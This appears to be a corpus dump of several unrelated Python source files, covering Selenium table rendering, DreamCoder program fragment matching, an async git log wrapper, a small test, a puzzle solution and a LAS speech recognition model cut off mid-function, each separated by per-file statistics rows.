| 31.916667 | 82 | 0.613577 | 160 | 1,532 | 5.7625 | 0.40625 | 0.043384 | 0.039046 | 0.032538 | 0.084599 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00363 | 0.280679 | 1,532 | 47 | 83 | 32.595745 | 0.833031 | 0.063969 | 0 | 0.121212 | 0 | 0 | 0.123413 | 0.057123 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.181818 | 0 | 0.424242 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89a008f95c4f137fc8a5dd19f62512f61a7e159 | 3,491 | py | Python | src/tools.py | matthewtwarren/TableGeneration | 011af5d4745e5388eb9648baa334c57f2371ddec | [
"MIT"
] | null | null | null | src/tools.py | matthewtwarren/TableGeneration | 011af5d4745e5388eb9648baa334c57f2371ddec | [
"MIT"
] | null | null | null | src/tools.py | matthewtwarren/TableGeneration | 011af5d4745e5388eb9648baa334c57f2371ddec | [
"MIT"
] | null | null | null | import traceback
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver import Firefox
from selenium.webdriver.firefox.options import Options
from PIL import Image
from io import BytesIO
import warnings
import json
import time
from bs4 import BeautifulSoup
# Suppress all library warnings by monkey-patching warnings.warn with a no-op
def warn(*args, **kwargs):
    pass
warnings.warn = warn
def html_to_img(driver,html_content,id_count):
'''Converts html to image.
Args:
driver: Selenium web driver
html_content: String containing html code for table
id_count: number of text entities in table
Returns:
im: cropped table image
bboxes: list of lists containing the text, text length and bbox positions for each table entity
'''
    counter = 1  # retry counter; the exception is re-raised once this reaches 10 (nine consecutive failures)
while(True):
try:
driver.get("data:text/html;charset=utf-8," + html_content)
driver.set_window_size(3000,3000)
window_size=driver.get_window_size()
max_height,max_width=window_size['height'],window_size['width']
element = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, '0')))
bboxes=[]
for id in range(id_count):
#e = driver.find_element_by_id(str(id))
e = WebDriverWait(driver, 3).until(EC.presence_of_element_located((By.ID, str(id))))
txt=e.text.strip()
lentext=len(txt)
loc = e.location
size_ = e.size
xmin = loc['x']
ymin = loc['y']
xmax = int(size_['width'] + xmin)
ymax = int(size_['height'] + ymin)
bboxes.append([lentext,txt,xmin,ymin,xmax,ymax])
# cv2.rectangle(im,(xmin,ymin),(xmax,ymax),(0,0,255),2)
png = driver.get_screenshot_as_png()
im = Image.open(BytesIO(png))
im = crop_image(im,bboxes)
return im,bboxes
except Exception as e:
counter+=1
if(counter==10):
raise e
continue
def crop_image(image,bboxes):
'''Crops image using bbox coordinates.
Args:
image: PIL image object.
bboxes: list of lists containg text bbox coordinates.
Returns:
cropped_image: cropped image.
'''
x_max, y_max = [], []
for set in bboxes:
x_max.append(int(set[4]))
y_max.append(int(set[5]))
max_width = max(x_max)+30
max_height = max(y_max)+30
cropped_image = image.crop((0,0, max_width, max_height))
return(cropped_image)
def html_to_csv(html_content):
'''Converts HTML file to .csv.
Args:
html_content: string containing contents of .html files.
Returns:
output_rows: list of lists containing contents of each row.
'''
    soup = BeautifulSoup(html_content, 'html.parser')  # explicit parser avoids bs4's parser-guessing warning
table = soup.find("table")
output_rows = []
for table_row in table.findAll('tr'):
headers = table_row.findAll('th')
columns = table_row.findAll('td')
output_row = []
for header in headers:
output_row.append(header.text)
for column in columns:
output_row.append(column.text)
output_rows.append(output_row)
return(output_rows)
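
# Illustrative wiring (assumed usage; the module leaves driver creation to the caller):
# opts = Options()
# opts.headless = True
# driver = Firefox(options=opts)
# image, bboxes = html_to_img(driver, html_content, id_count=4)
# rows = html_to_csv(html_content)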
| 29.336134 | 130 | 0.616729 | 452 | 3,491 | 4.621681 | 0.336283 | 0.031594 | 0.050263 | 0.026807 | 0.052657 | 0.052657 | 0.052657 | 0.052657 | 0.052657 | 0.052657 | 0 | 0.013649 | 0.286451 | 3,491 | 118 | 131 | 29.584746 | 0.82497 | 0.240619 | 0 | 0 | 0 | 0 | 0.02545 | 0.011355 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0.014706 | 0.176471 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89b02505f482c17f49309f8d5fb5765f2c6a655 | 569 | py | Python | sols_python/1276.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1276.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | sols_python/1276.py | souzajackson/Beecrowd | c7323e51cd5132c523a1812be5ad5de1a152a63f | [
"MIT"
] | null | null | null | while True:
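    # Collapse each input line's distinct characters into maximal ASCII-contiguous
    # ranges printed as "a:c, e:e"; the appended sentinel 127 closes the final range.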
try:
entrada = sorted(list(input().replace(' ', '')))
entrada = list(map(ord, entrada))
entrada.append(127)
intervalos = list()
comecoDoIntervalo = 0
for pos, char in enumerate(entrada):
if pos != len(entrada) - 1:
if entrada[pos + 1] <= char + 1:
continue
intervalos.append(f'{chr(entrada[comecoDoIntervalo])}:{chr(char)}')
comecoDoIntervalo = pos + 1
print(', '.join(intervalos))
except EOFError:
break
| 33.470588 | 83 | 0.514938 | 55 | 569 | 5.327273 | 0.563636 | 0.027304 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021798 | 0.355009 | 569 | 16 | 84 | 35.5625 | 0.776567 | 0 | 0 | 0 | 0 | 0 | 0.084359 | 0.079086 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.0625 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89bfc3c5038ff312878d7e81c0e25eaee88ea7c | 13,685 | py | Python | dreamcoder/fragmentUtilities.py | theosech/ec | 7fc34fb9df8d1b34bd4eb11551ca6fa0f574ce0e | [
"Unlicense"
] | 290 | 2018-02-09T01:29:07.000Z | 2022-03-20T14:49:53.000Z | dreamcoder/fragmentUtilities.py | evelinehong/dreamcoder | 9de0434359721c8a4ecc44ae76649e21f1479c3d | [
"MIT"
] | 34 | 2018-03-23T00:33:49.000Z | 2022-03-19T21:48:09.000Z | dreamcoder/fragmentUtilities.py | evelinehong/dreamcoder | 9de0434359721c8a4ecc44ae76649e21f1479c3d | [
"MIT"
] | 98 | 2018-03-07T19:26:55.000Z | 2022-03-28T14:36:38.000Z | from dreamcoder.type import *
from dreamcoder.program import *
from dreamcoder.frontier import *
from collections import Counter
class MatchFailure(Exception):
pass
class Matcher(object):
def __init__(self, context):
self.context = context
self.variableBindings = {}
@staticmethod
def match(context, fragment, expression, numberOfArguments):
if not mightMatch(fragment, expression):
raise MatchFailure()
m = Matcher(context)
tp = fragment.visit(m, expression, [], numberOfArguments)
return m.context, tp, m.variableBindings
def application(
self,
fragment,
expression,
environment,
numberOfArguments):
'''returns tp of fragment.'''
if not isinstance(expression, Application):
raise MatchFailure()
ft = fragment.f.visit(
self,
expression.f,
environment,
numberOfArguments + 1)
xt = fragment.x.visit(self, expression.x, environment, 0)
self.context, returnType = self.context.makeVariable()
try:
self.context = self.context.unify(ft, arrow(xt, returnType))
except UnificationFailure:
raise MatchFailure()
return returnType.apply(self.context)
def index(self, fragment, expression, environment, numberOfArguments):
# This is a bound variable
surroundingAbstractions = len(environment)
if fragment.bound(surroundingAbstractions):
if expression == fragment:
return environment[fragment.i].apply(self.context)
else:
raise MatchFailure()
# This is a free variable
i = fragment.i - surroundingAbstractions
# Make sure that it doesn't refer to anything bound by a
# lambda in the fragment. Otherwise it cannot be safely lifted
# out of the fragment and preserve semantics
for fv in expression.freeVariables():
if fv < len(environment):
raise MatchFailure()
# The value is going to be lifted out of the fragment
try:
expression = expression.shift(-surroundingAbstractions)
except ShiftFailure:
raise MatchFailure()
# Wrap it in the appropriate number of lambda expressions & applications
# This is because everything has to be in eta-longform
if numberOfArguments > 0:
expression = expression.shift(numberOfArguments)
for j in reversed(range(numberOfArguments)):
expression = Application(expression, Index(j))
for _ in range(numberOfArguments):
expression = Abstraction(expression)
# Added to the bindings
if i in self.variableBindings:
(tp, binding) = self.variableBindings[i]
if binding != expression:
raise MatchFailure()
else:
self.context, tp = self.context.makeVariable()
self.variableBindings[i] = (tp, expression)
return tp
def abstraction(
self,
fragment,
expression,
environment,
numberOfArguments):
if not isinstance(expression, Abstraction):
raise MatchFailure()
self.context, argumentType = self.context.makeVariable()
returnType = fragment.body.visit(
self, expression.body, [argumentType] + environment, 0)
return arrow(argumentType, returnType)
def primitive(self, fragment, expression, environment, numberOfArguments):
if fragment != expression:
raise MatchFailure()
self.context, tp = fragment.tp.instantiate(self.context)
return tp
def invented(self, fragment, expression, environment, numberOfArguments):
if fragment != expression:
raise MatchFailure()
self.context, tp = fragment.tp.instantiate(self.context)
return tp
def fragmentVariable(
self,
fragment,
expression,
environment,
numberOfArguments):
raise Exception(
'Deprecated: matching against fragment variables. Convert fragment to canonical form to get rid of fragment variables.')
def mightMatch(f, e, d=0):
'''Checks whether fragment f might be able to match against expression e'''
if f.isIndex:
if f.bound(d):
return f == e
return True
if f.isPrimitive or f.isInvented:
return f == e
if f.isAbstraction:
return e.isAbstraction and mightMatch(f.body, e.body, d + 1)
if f.isApplication:
return e.isApplication and mightMatch(
f.x, e.x, d) and mightMatch(
f.f, e.f, d)
assert False
def canonicalFragment(expression):
'''
Puts a fragment into a canonical form:
1. removes all FragmentVariable's
2. renames all free variables based on depth first traversal
'''
return expression.visit(CanonicalVisitor(), 0)
class CanonicalVisitor(object):
def __init__(self):
self.numberOfAbstractions = 0
self.mapping = {}
def fragmentVariable(self, e, d):
self.numberOfAbstractions += 1
return Index(self.numberOfAbstractions + d - 1)
def primitive(self, e, d): return e
def invented(self, e, d): return e
def application(self, e, d):
return Application(e.f.visit(self, d), e.x.visit(self, d))
def abstraction(self, e, d):
return Abstraction(e.body.visit(self, d + 1))
def index(self, e, d):
if e.bound(d):
return e
i = e.i - d
if i in self.mapping:
return Index(d + self.mapping[i])
self.mapping[i] = self.numberOfAbstractions
self.numberOfAbstractions += 1
return Index(self.numberOfAbstractions - 1 + d)
def fragmentSize(f, boundVariableCost=0.1, freeVariableCost=0.01):
freeVariables = 0
leaves = 0
boundVariables = 0
for surroundingAbstractions, e in f.walk():
if isinstance(e, (Primitive, Invented)):
leaves += 1
if isinstance(e, Index):
if e.bound(surroundingAbstractions):
boundVariables += 1
else:
freeVariables += 1
assert not isinstance(e, FragmentVariable)
return leaves + boundVariableCost * \
boundVariables + freeVariableCost * freeVariables
def primitiveSize(e):
if e.isInvented:
e = e.body
return fragmentSize(e)
def defragment(expression):
'''Converts a fragment into an invented primitive'''
if isinstance(expression, (Primitive, Invented)):
return expression
expression = canonicalFragment(expression)
for _ in range(expression.numberOfFreeVariables):
expression = Abstraction(expression)
return Invented(expression)
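
# Illustrative use (hypothetical fragment; assumes dreamcoder's Program.parse):
# f = Program.parse("(+ 1 $0)")
# prim = defragment(f)  # canonicalizes, wraps the free variable in a lambda, returns an Invented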
class RewriteFragments(object):
def __init__(self, fragment):
self.fragment = fragment
self.concrete = defragment(fragment)
def tryRewrite(self, e, numberOfArguments):
try:
context, t, bindings = Matcher.match(
Context.EMPTY, self.fragment, e, numberOfArguments)
except MatchFailure:
return None
assert frozenset(bindings.keys()) == frozenset(range(len(bindings))),\
"Perhaps the fragment is not in canonical form?"
e = self.concrete
for j in range(len(bindings) - 1, -1, -1):
_, b = bindings[j]
e = Application(e, b)
return e
def application(self, e, numberOfArguments):
e = Application(e.f.visit(self, numberOfArguments + 1),
e.x.visit(self, 0))
return self.tryRewrite(e, numberOfArguments) or e
def index(self, e, numberOfArguments): return e
def invented(self, e, numberOfArguments): return e
def primitive(self, e, numberOfArguments): return e
def abstraction(self, e, numberOfArguments):
e = Abstraction(e.body.visit(self, 0))
return self.tryRewrite(e, numberOfArguments) or e
def rewrite(self, e): return e.visit(self, 0)
@staticmethod
def rewriteFrontier(frontier, fragment):
worker = RewriteFragments(fragment)
return Frontier([FrontierEntry(program=worker.rewrite(e.program),
logLikelihood=e.logLikelihood,
logPrior=e.logPrior,
logPosterior=e.logPosterior)
for e in frontier],
task=frontier.task)
def proposeFragmentsFromFragment(f):
'''Abstracts out repeated structure within a single fragment'''
yield f
freeVariables = f.numberOfFreeVariables
closedSubtrees = Counter(
subtree for _,
subtree in f.walk() if not isinstance(
subtree,
Index) and subtree.closed)
del closedSubtrees[f]
for subtree, freq in closedSubtrees.items():
if freq < 2:
continue
yield canonicalFragment(f.substitute(subtree, Index(freeVariables)))
def nontrivial(f):
if not isinstance(f, Application):
return False
# Curry
if isinstance(f.x, FragmentVariable):
return False
if isinstance(f.x, Index):
# Make sure that the index is used somewhere else
if not any(
isinstance(
child,
Index) and child.i -
surroundingAbstractions == f.x.i for surroundingAbstractions,
child in f.f.walk()):
return False
numberOfHoles = 0
numberOfVariables = 0
numberOfPrimitives = 0
for surroundingAbstractions, child in f.walk():
if isinstance(child, (Primitive, Invented)):
numberOfPrimitives += 1
if isinstance(child, FragmentVariable):
numberOfHoles += 1
if isinstance(child, Index) and child.free(surroundingAbstractions):
numberOfVariables += 1
#eprint("Fragment %s has %d calls and %d variables and %d primitives"%(f,numberOfHoles,numberOfVariables,numberOfPrimitives))
return numberOfPrimitives + 0.5 * \
(numberOfHoles + numberOfVariables) > 1.5 and numberOfPrimitives >= 1
def violatesLaziness(fragment):
"""
conditionals are lazy on the second and third arguments. this
invariant must be maintained by learned fragments.
"""
for surroundingAbstractions, child in fragment.walkUncurried():
if not child.isApplication:
continue
f, xs = child.applicationParse()
if not (f.isPrimitive and f.name == "if"):
continue
# curried conditionals always violate laziness
if len(xs) != 3:
return True
# yes/no branches
y = xs[1]
n = xs[2]
return \
any(yc.isIndex and yc.i >= yd
for yd, yc in y.walk(surroundingAbstractions)) or \
any(nc.isIndex and nc.i >= nd
for nd, nc in n.walk(surroundingAbstractions))
return False
def proposeFragmentsFromProgram(p, arity):
def fragment(expression, a, toplevel=True):
"""Generates fragments that unify with expression"""
if a == 1:
yield FragmentVariable.single
if a == 0:
yield expression
return
if isinstance(expression, Abstraction):
# Symmetry breaking: (\x \y \z ... f(x,y,z,...)) defragments to be
# the same as f(x,y,z,...)
if not toplevel:
for b in fragment(expression.body, a, toplevel=False):
yield Abstraction(b)
elif isinstance(expression, Application):
for fa in range(a + 1):
for f in fragment(expression.f, fa, toplevel=False):
for x in fragment(expression.x, a - fa, toplevel=False):
yield Application(f, x)
else:
assert isinstance(expression, (Invented, Primitive, Index))
def fragments(expression, a):
"""Generates fragments that unify with subexpressions of expression"""
yield from fragment(expression, a)
if isinstance(expression, Application):
curry = True
if curry:
yield from fragments(expression.f, a)
yield from fragments(expression.x, a)
else:
# Pretend that it is not curried
function, arguments = expression.applicationParse()
yield from fragments(function, a)
for argument in arguments:
yield from fragments(argument, a)
elif isinstance(expression, Abstraction):
yield from fragments(expression.body, a)
else:
assert isinstance(expression, (Invented, Primitive, Index))
return {canonicalFragment(f) for b in range(arity + 1)
for f in fragments(p, b) if nontrivial(f)}
def proposeFragmentsFromFrontiers(frontiers, a, CPUs=1):
fragmentsFromEachFrontier = parallelMap(
CPUs, lambda frontier: {
fp for entry in frontier.entries for f in proposeFragmentsFromProgram(
entry.program, a) for fp in proposeFragmentsFromFragment(f)}, frontiers)
allFragments = Counter(f for frontierFragments in fragmentsFromEachFrontier
for f in frontierFragments)
return [fragment for fragment, frequency in allFragments.items()
if frequency >= 2 and fragment.wellTyped() and nontrivial(fragment)]
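
# Illustrative call (assumed Frontier inputs; not part of the original module):
# fragments = proposeFragmentsFromFrontiers(frontiers, a=2, CPUs=4)
# Only fragments seen in at least two frontiers that are well-typed and nontrivial survive.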
| 33.706897 | 132 | 0.608403 | 1,417 | 13,685 | 5.864502 | 0.191249 | 0.021179 | 0.015884 | 0.023827 | 0.163177 | 0.103008 | 0.074368 | 0.047413 | 0.047413 | 0.047413 | 0 | 0.005705 | 0.308367 | 13,685 | 405 | 133 | 33.790123 | 0.872266 | 0.096748 | 0 | 0.222222 | 0 | 0 | 0.013445 | 0 | 0 | 0 | 0 | 0 | 0.016835 | 1 | 0.121212 | false | 0.003367 | 0.013468 | 0.026936 | 0.276094 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89c40d11f3ea99db83312ef63f2c4e642a883e6 | 2,842 | py | Python | git_interface/log.py | enchant97/python-git-interface | 0ac236f35610ec17f34e07d00e3dc7b9349a07b4 | [
"MIT"
] | null | null | null | git_interface/log.py | enchant97/python-git-interface | 0ac236f35610ec17f34e07d00e3dc7b9349a07b4 | [
"MIT"
] | 1 | 2021-12-10T09:59:06.000Z | 2021-12-10T09:59:06.000Z | git_interface/log.py | enchant97/python-git-interface | 0ac236f35610ec17f34e07d00e3dc7b9349a07b4 | [
"MIT"
] | 1 | 2021-10-10T07:20:09.000Z | 2021-10-10T07:20:09.000Z | """
Methods for using the 'log' command
"""
import re
from collections.abc import Coroutine, Iterator
from datetime import datetime
from pathlib import Path
from typing import Any, Optional
from .constants import EMPTY_REPO_RE, UNKNOWN_REV_RE
from .datatypes import Log
from .exceptions import (GitException, NoCommitsException, NoLogsException,
UnknownRevisionException)
from .helpers import subprocess_run
__all__ = ["get_logs"]
def __process_log(stdout_line: str) -> Log:
parts = stdout_line.split(";;")
if len(parts) != 6:
raise ValueError(f"invalid log line: {stdout_line}")
return Log(
parts[0],
parts[1],
parts[2],
parts[3],
datetime.fromisoformat(parts[4]),
parts[5],
)
def __process_logs(stdout: str) -> Iterator[Log]:
log_lines = stdout.strip().split("\n")
return map(__process_log, log_lines)
async def get_logs(
git_repo: Path,
branch: Optional[str] = None,
max_number: Optional[int] = None,
since: Optional[datetime] = None,
until: Optional[datetime] = None) -> Coroutine[Any, Any, Iterator[Log]]:
"""
Generate git logs from a repo
:param git_repo: Path to the repo
:param branch: The branch name, defaults to None
:param max_number: max number of logs to get, defaults to None
:param since: Filter logs after given date, defaults to None
    :param until: Filter logs before given date, defaults to None
:raises NoCommitsException: Repo has no commits
:raises UnknownRevisionException: Unknown revision/branch name
:raises GitException: Error to do with git
:raises NoLogsException: No logs have been generated
:return: The generated logs
"""
args = ["git", "-C", str(git_repo), "log"]
if branch is not None:
args.append(str(branch))
if max_number is not None:
args.append(f"--max-count={max_number}")
if since is not None:
args.append(f"--since={since.isoformat()}")
if until is not None:
args.append(f"--until={until.isoformat()}")
# formats: https://git-scm.com/docs/pretty-formats
args.append("--pretty=%H;;%P;;%ae;;%an;;%cI;;%s")
process_status = await subprocess_run(args)
if not process_status.stdout:
stderr = process_status.stderr.decode()
if re.match(EMPTY_REPO_RE, stderr):
raise NoCommitsException()
if re.match(UNKNOWN_REV_RE, stderr):
raise UnknownRevisionException(f"unknown revision/branch {branch}")
if process_status.returncode != 0:
raise GitException(stderr)
raise NoLogsException(f"no logs found (using given filters) for '{git_repo.name}'")
stdout = process_status.stdout.decode()
return __process_logs(stdout)
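
# Illustrative call (hypothetical repo path; get_logs is a coroutine):
# import asyncio
# logs = asyncio.run(get_logs(Path("/srv/git/example.git"), branch="main", max_number=10))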
| 34.240964 | 91 | 0.656228 | 362 | 2,842 | 5.024862 | 0.334254 | 0.024739 | 0.030786 | 0.028587 | 0.068719 | 0.032985 | 0 | 0 | 0 | 0 | 0 | 0.003685 | 0.236101 | 2,842 | 82 | 92 | 34.658537 | 0.834178 | 0.029909 | 0 | 0 | 0 | 0 | 0.118868 | 0.05283 | 0 | 0 | 0 | 0 | 0 | 1 | 0.037037 | false | 0 | 0.166667 | 0 | 0.259259 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89e4d3b337252097f719afef8ec42c9e3d2ddb5 | 916 | py | Python | tests/bdc_core/decorators/test_utils.py | raphaelrpl/bdc-core | 91b09905e809248521d3e782af0d77ee0fbde4a7 | [
"MIT"
] | 1 | 2020-02-06T13:54:48.000Z | 2020-02-06T13:54:48.000Z | tests/bdc_core/decorators/test_utils.py | raphaelrpl/bdc-core | 91b09905e809248521d3e782af0d77ee0fbde4a7 | [
"MIT"
] | 10 | 2019-07-15T18:30:14.000Z | 2020-05-18T20:32:42.000Z | tests/bdc_core/decorators/test_utils.py | raphaelrpl/bdc-core | 91b09905e809248521d3e782af0d77ee0fbde4a7 | [
"MIT"
] | 2 | 2019-07-04T12:31:56.000Z | 2019-07-10T15:01:21.000Z | import os
from tempfile import gettempdir
from unittest import TestCase
from bdc_core.decorators import utils
class TestDecoratorsUtils(TestCase):
@staticmethod
def get_working_dir(directory):
@utils.working_directory(directory)
def working_dir_wrapper():
return os.getcwd()
return working_dir_wrapper
def test_change_working_dir_to_temp(self):
test_dir = os.path.abspath(os.getcwd())
expected_dir = gettempdir()
get_working_dir = TestDecoratorsUtils.get_working_dir(expected_dir)
temp_dir = get_working_dir()
self.assertNotEqual(test_dir, temp_dir)
self.assertEqual(temp_dir, expected_dir)
def test_throw_error_invalid_directory(self):
get_working_dir = TestDecoratorsUtils.get_working_dir('/fake/It-Does-Not-Exists')
with self.assertRaises(FileNotFoundError):
get_working_dir() | 29.548387 | 89 | 0.721616 | 110 | 916 | 5.672727 | 0.390909 | 0.160256 | 0.145833 | 0.102564 | 0.144231 | 0.144231 | 0.144231 | 0 | 0 | 0 | 0 | 0 | 0.20524 | 916 | 31 | 90 | 29.548387 | 0.857143 | 0 | 0 | 0 | 0 | 0 | 0.026172 | 0.026172 | 0 | 0 | 0 | 0 | 0.136364 | 1 | 0.181818 | false | 0 | 0.181818 | 0.045455 | 0.5 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e89f1f87543ead1bd285811638e6a51a57f2f847 | 13,303 | py | Python | experiments/src/models/recognition/las.py | cricketclub/gridspace-stanford-harper-valley | 0bd721e877c4a85d8c13ff837e68661ea6200a98 | [
"CC-BY-4.0"
] | 10 | 2021-01-09T00:52:28.000Z | 2022-03-29T09:16:32.000Z | experiments/src/models/recognition/las.py | cricketclub/gridspace-stanford-harper-valley | 0bd721e877c4a85d8c13ff837e68661ea6200a98 | [
"CC-BY-4.0"
] | null | null | null | experiments/src/models/recognition/las.py | cricketclub/gridspace-stanford-harper-valley | 0bd721e877c4a85d8c13ff837e68661ea6200a98 | [
"CC-BY-4.0"
] | 7 | 2020-08-04T17:22:19.000Z | 2022-02-15T06:03:49.000Z | import os
import numpy as np
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.nn.utils.rnn as rnn_utils
from torch.distributions import Categorical
from src.utils import edit_distance
class LASEncoderDecoder(nn.Module):
def __init__(
self,
input_dim,
num_class,
label_maxlen,
listener_hidden_dim=256,
listener_num_layers=2,
listener_bidirectional=True,
speller_num_layers=1,
mlp_hidden_dim=128,
multi_head=1,
sos_index=0,
):
super().__init__()
self.listener = Listener(
input_dim,
hidden_dim=listener_hidden_dim,
num_pyramid_layers=listener_num_layers,
bidirectional=listener_bidirectional,
)
self.speller = Speller(
num_class,
label_maxlen,
listener_hidden_dim,
mlp_hidden_dim,
num_layers=speller_num_layers,
multi_head=multi_head,
sos_index=sos_index,
)
self.embedding_dim = listener_hidden_dim * 4
def combine_h_and_c(self, h, c):
batch_size = h.size(1)
h = h.permute(1, 0, 2).contiguous()
c = c.permute(1, 0, 2).contiguous()
h = h.view(batch_size, -1)
c = c.view(batch_size, -1)
return torch.cat([h, c], dim=1)
def forward(
self,
inputs,
input_lengths,
ground_truth=None,
teacher_force_prob=0.9,
):
listener_feats, (listener_h, listener_c) = self.listener(
inputs, input_lengths)
embedding = self.combine_h_and_c(listener_h, listener_c)
log_probs = self.speller(
listener_feats,
ground_truth=ground_truth,
teacher_force_prob=teacher_force_prob,
)
return log_probs, embedding
def get_loss(
self,
log_probs,
labels,
num_labels,
pad_index=0,
label_smooth=0.1,
):
batch_size = log_probs.size(0)
labels_maxlen = labels.size(1)
if label_smooth == 0.0:
log_probs = log_probs.view(batch_size * labels_maxlen, -1)
labels = labels.long().view(batch_size * labels_maxlen)
loss = F.nll_loss(log_probs, labels, ignore_index=pad_index)
else:
loss = label_smooth_loss(
log_probs, labels.float(), num_labels, smooth_param=label_smooth)
return loss
def decode(
self,
log_probs,
input_lengths,
labels,
label_lengths,
sos_index,
eos_index,
pad_index,
eps_index,
):
# Use greedy decoding.
decoded = torch.argmax(log_probs, dim=2)
batch_size = decoded.size(0)
# Collapse each decoded sequence using CTC rules.
hypotheses = []
hypothesis_lengths = []
references = []
reference_lengths = []
for i in range(batch_size):
decoded_i = decoded[i]
hypothesis_i = []
for tok in decoded_i:
if tok.item() == sos_index:
continue
if tok.item() == pad_index:
continue
if tok.item() == eos_index:
# once we reach an EOS token, we are done generating.
break
hypothesis_i.append(tok.item())
hypotheses.append(hypothesis_i)
hypothesis_lengths.append(len(hypothesis_i))
if labels is not None:
reference_i = [tok.item() for tok in labels[i]
if tok.item() != sos_index and
tok.item() != eos_index and
tok.item() != pad_index]
references.append(reference_i)
reference_lengths.append(len(reference_i))
if labels is None: # Run at inference time.
references, reference_lengths = None, None
return hypotheses, hypothesis_lengths, references, reference_lengths
class Listener(nn.Module):
"""Listener (encoder for LAS model). Use a bidirectional
LSTM as the encoder.
Args:
input_dim: integer
number of input features
num_class: integer
size of transcription vocabulary
num_layers: integer (default: 2)
number of layers in encoder LSTM
hidden_dim: integer (default: 128)
number of hidden dimensions for encoder LSTM
bidirectional: boolean (default: True)
is the encoder LSTM bidirectional?
"""
def __init__(
self,
input_dim,
hidden_dim=128,
num_pyramid_layers=2,
bidirectional=True,
dropout_rate=0.,
):
super().__init__()
self.rnn_layer0 = PyramidLSTMLayer(
input_dim, hidden_dim, num_layers=1, bidirectional=bidirectional, dropout=dropout_rate)
for i in range(1, num_pyramid_layers):
setattr(
self, f'rnn_layer{i}',
PyramidLSTMLayer(
hidden_dim * 2, hidden_dim, num_layers=1,
bidirectional=bidirectional, dropout=dropout_rate),
)
self.num_pyramid_layers = num_pyramid_layers
def forward(self, inputs, input_lengths):
outputs, hiddens = self.rnn_layer0(inputs)
for i in range(1, self.num_pyramid_layers):
outputs, hiddens = getattr(self, f'rnn_layer{i}')(outputs)
return outputs, hiddens
class Speller(nn.Module):
def __init__(
self,
num_labels,
label_maxlen,
listener_hidden_dim,
mlp_hidden_dim,
num_layers=1,
multi_head=1,
sos_index=0,
):
super().__init__()
speller_hidden_dim = listener_hidden_dim * 2
self.rnn = nn.LSTM(
num_labels + speller_hidden_dim,
speller_hidden_dim,
num_layers=num_layers,
batch_first=True,
)
self.attention = AttentionLayer(
speller_hidden_dim,
mlp_hidden_dim,
multi_head=multi_head,
)
self.fc_out = nn.Linear(speller_hidden_dim*2, num_labels)
self.num_labels = num_labels
self.label_maxlen = label_maxlen
self.sos_index = sos_index
def step(self, inputs, last_hiddens, listener_feats):
outputs, cur_hiddens = self.rnn(inputs, last_hiddens)
attention_score, context = self.attention(outputs, listener_feats)
features = torch.cat((outputs.squeeze(1), context), dim=-1)
logits = self.fc_out(features)
log_probs = torch.log_softmax(logits, dim=-1)
return log_probs, cur_hiddens, context, attention_score
def forward(
self,
listener_feats,
ground_truth=None,
teacher_force_prob=0.9,
):
device = listener_feats.device
if ground_truth is None: teacher_force_prob = 0
teacher_force = np.random.random_sample() < teacher_force_prob
batch_size = listener_feats.size(0)
with torch.no_grad():
output_toks = torch.zeros((batch_size, 1, self.num_labels), device=device)
output_toks[:, 0, self.sos_index] = 1
rnn_inputs = torch.cat([output_toks, listener_feats[:, 0:1, :]], dim=-1)
hidden_state = None
log_probs_seq = []
if (ground_truth is None) or (not teacher_force_prob):
max_step = int(self.label_maxlen)
else:
max_step = int(ground_truth.size(1))
for step in range(max_step):
log_probs, hidden_state, context, _ = self.step(
rnn_inputs, hidden_state, listener_feats)
log_probs_seq.append(log_probs.unsqueeze(1))
if teacher_force:
gt_tok = ground_truth[:, step:step+1].float()
output_tok = torch.zeros_like(log_probs)
for idx, i in enumerate(gt_tok):
output_tok[idx, int(i.item())] = 1
output_tok = output_tok.unsqueeze(1)
            else:
                # Greedy decoding: feed the argmax token back in as the next input
